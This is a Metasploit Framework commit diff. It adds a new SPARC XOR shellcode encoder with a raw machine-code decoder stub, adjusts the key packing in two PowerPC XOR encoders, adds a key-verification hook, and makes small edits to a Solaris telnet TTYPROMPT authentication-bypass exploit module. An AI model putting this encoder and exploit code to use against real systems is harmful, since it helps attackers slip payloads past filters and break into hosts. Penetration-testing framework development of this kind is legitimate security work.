Updates to sparc/ppc encoders, added find_key_verify()

git-svn-id: file:///home/svn/incoming/trunk@3274 4d416f70-5f16-0410-b530-b9f4589650da

lib/msf/core/encoder.rb

@@ -346,6 +346,8 @@ protected
 					found = false
 				end
 			}
+			
+			found = find_key_verify(key_bytes, badchars) if found
 		end
 
 		# Do we have all the key bytes accounted for?
@@ -394,6 +396,13 @@ protected
 		return [ integer.to_i ].pack(decoder_key_pack).unpack('C' + decoder_key_size.to_s)
 	end
 
+	#
+	# Determines if the key selected by find_key is usable
+	#
+	def find_key_verify(key_bytes, badchars)
+		true
+	end
+
 end
 
 end

modules/encoders/ppc/longxor.rb

@@ -20,6 +20,7 @@ class LongXor < Msf::Encoder::Xor
 				{
 					'KeySize'    => 4,
 					'BlockSize'  => 4,
+					'KeyPack'    => 'N',
 				})
 	end
 
@@ -58,8 +59,8 @@ class LongXor < Msf::Encoder::Xor
 		icount = state.buf.length / 4
 
 		stub[30, 2] = [ 1974 + icount  ].pack('n')
-		stub[22, 2] = [ state.key.to_i ].pack('n')[0, 2]
+		stub[22, 2] = [ state.key.to_i ].pack('N')[0, 2]
-		stub[26, 2] = [ state.key.to_i ].pack('n')[2, 2]
+		stub[26, 2] = [ state.key.to_i ].pack('N')[2, 2]
 
 		stub
 	end

modules/encoders/ppc/longxor_tag.rb

@@ -20,12 +20,12 @@ class LongXorTag < Msf::Encoder::Xor
 				{
 					'KeySize'    => 4,
 					'BlockSize'  => 4,
+					'KeyPack'    => 'N',					
 				})
 	end
 
 	#
-	# Returns the decoder stub that is adjusted for the size of
+	# Returns the decoder stub 
-	# the buffer being encoded
 	#
 	def decoder_stub(state)
 		[
@@ -53,8 +53,8 @@ class LongXorTag < Msf::Encoder::Xor
 	# Fix up the decoder stub now 
 	#
 	def encode_finalize_stub(state, stub)
-		stub[22, 2] = [ state.key.to_i ].pack('n')[0, 2]
+		stub[22, 2] = [ state.key.to_i ].pack('N')[0, 2]
-		stub[26, 2] = [ state.key.to_i ].pack('n')[2, 2]
+		stub[26, 2] = [ state.key.to_i ].pack('N')[2, 2]
 
 		stub
 	end

modules/encoders/sparc/optyx.rb

@@ -0,0 +1,63 @@
+require 'msf/core'
+
+module Msf
+module Encoders
+module Sparc
+
+class LongXor < Msf::Encoder::Xor
+
+	def initialize
+		super(
+			'Name'             => 'SPARC DWORD XOR Encoder',
+			'Version'          => '$Revision$',
+			'Description'      => %q{
+				This encoder is optyx's 48-byte SPARC encoder with some tweaks.
+			},
+			'Author'           => [ 'optyx', 'hdm' ],
+			'Arch'             => ARCH_SPARC,
+			'Decoder'          =>
+				{
+					'KeySize'    => 4,
+					'BlockSize'  => 4,
+					'KeyPack'    => 'N',					
+				})
+	end
+
+	#
+	# Returns the decoder stub 
+	#
+	def decoder_stub(state)
+		Rex::Arch::Sparc.set_dword(state.key, 'l1') + 
+		"\x20\xbf\xff\xff" +   # bn,a  _start - 4 
+		"\x20\xbf\xff\xff" +   # bn,a  _start     
+		"\x7f\xff\xff\xff" +   # call  _start + 4 
+		"\xea\x03\xe0\x20" +   # ld    [%o7 + 0x20],%l7 
+		"\xaa\x9d\x40\x11" +   # xorcc %l5,%l1,%l5 
+		"\xea\x23\xe0\x20" +   # st    %l5,[%o7 + 0x20] 
+		"\xa2\x04\x40\x15" +   # add   %l1,%l5,%l1 
+		"\x81\xdb\xe0\x20" +   # flush %o7 + 0x20 
+		"\x12\xbf\xff\xfb" +   # bnz   dec_loop 
+		"\x9e\x03\xe0\x04"     # add   %o7,4,%o7 	
+	end
+
+	#
+	# Append the decoder key now that we're done
+	#
+	def encode_end(state)
+		state.encoded += [ state.key.to_i ].pack('N')
+	end
+
+	#
+	# Verify that the chosen key doesn't become an invalid byte due to
+	# the set_dword() result (22/10 bit split)
+	#
+	def find_key_verify(key_bytes, badchars)
+		return ( has_badchars?(
+			Rex::Arch::Sparc.set_dword(key_bytes_to_integer(key_bytes), 'l1'),
+			badchars
+		) ? false : true)
+	end
+		
+end
+
+end end end

modules/exploits/solaris/telnet/ttyprompt.rb

@@ -55,7 +55,6 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
 		
 		banner = sock.get_once
 		
-		p banner
 		print_status("Setting TTYPROMPT...")
 		
 		req = 
@@ -82,7 +81,6 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
 		sleep(0.25)
 		
 		handler
-		disconnect
 	end
 
 end